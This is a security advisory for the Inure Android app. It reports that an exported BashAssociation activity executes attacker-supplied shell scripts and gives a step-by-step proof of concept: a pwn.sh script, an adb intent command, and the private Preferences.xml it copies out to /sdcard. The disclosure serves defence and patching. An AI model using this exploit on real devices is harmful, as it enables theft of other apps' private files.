Theft of Arbitrary Files due to execution of attacker scripts from BashAssociation.kt

Description

Tested on Build87 of the Inure application. It was discovered that the application had an exported activity (app.simple.inure.activities.association.BashAssociation) which accepted intent data via the file scheme + text/x-shellscript mime type and executed the commands contained within those opened files via RunScript.java.

\

Since this activity is exported, it is possible for an installed malicious application to send an intent to this activity in order to execute malicious commands. In this particular case, it was possible to retrieve files from the vulnerable application’s internal directory (/data/data/app.simple.inure/) and exfiltrate it into /sdcard where the attacker could read the retrieved information.

Proof of Concept

1. Setup a directory on the sdcard

PS C:\Users\Acer> adb shell  
angelica:/ $ cd /sdcard  
angelica:/sdcard $ mkdir inure-proof-of-concept  
angelica:/sdcard $ cd inure-proof-of-concept/  
angelica:/sdcard $ echo "cp /data/data/app.simple.inure/shared_prefs/Preferences.xml /sdcard/inure-proof-of-concept/inure-exfiltrated.xml" > pwn.sh  
angelica:/sdcard/inure-proof-of-concept $ ls -la  
total 10  
drwxrwx--x 2 root sdcard_rw 3488 2023-08-13 13:32 .  
drwxrwx--x 51 root sdcard_rw 3488 2023-08-13 13:31 ..  
-rw-rw---- 1 root sdcard_rw 113 2023-08-13 13:32 pwn.sh

2. Perform the attack via an adb command:

PS C:\Users\Acer\Desktop\pwn-toolkit\apks\app.simple.inure> adb shell am start -a android.intent.action.VIEW -d "file:///sdcard/inure-proof-of-concept/pwn.sh" -n app.simple.inure/.activities.association.BashAssociation  
Starting: Intent { act=android.intent.action.VIEW dat=file:///sdcard/inure-proof-of-concept/pwn.sh cmp=app.simple.inure/.activities.association.BashAssociation }

3. Review the files on the directory we created in step 1, we can see that the Preferences.xml file was exfiltrated:

angelica:/sdcard/inure-proof-of-concept $ ls -la  
total 14  
drwxrwx--x 2 root sdcard_rw 3488 2023-08-13 13:34 .  
drwxrwx--x 51 root sdcard_rw 3488 2023-08-13 13:31 ..  
-rw-rw---- 1 root sdcard_rw 1119 2023-08-13 13:34 inure-exfiltrated.xml  
-rw-rw---- 1 root sdcard_rw 113 2023-08-13 13:32 pwn.sh  
angelica:/sdcard/inure-proof-of-concept $ cat inure-exfiltrated.xml  
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>  
<map>  
<boolean name="apk_external_storage" value="false" />  
<boolean name="is_external_storage" value="false" />  
<int name="app_accent_color" value="-29592" />  
<int name="main_app_launch_count" value="5" />  
<boolean name="is_custom_color" value="false" />  
<int name="view_positions" value="7" />  
<boolean name="disclaimer_agreed" value="true" />  
<string name="last_search_keyword"></string>  
<string name="crashCause">android.system.ErrnoException: open failed: ENOENT (No such file or directory)</string>  
<string name="home_path">/data/user/0/app.simple.inure/app_HOME</string>  
<string name="crash_message">java.lang.RuntimeException: Unable to start activity ComponentInfo{app.simple.inure/app  
.simple.inure.activities.association.BashAssociation}: java.io.FileNotFoundException: /sdcard/inure-proof-of-concept/inu  
re-root-id-test.sh: open failed: ENOENT (No such file or directory)</string>  
<long name="crash_timestamp" value="1691896905717" />  
<boolean name="deep_search_keyword_mode" value="false" />  
</map>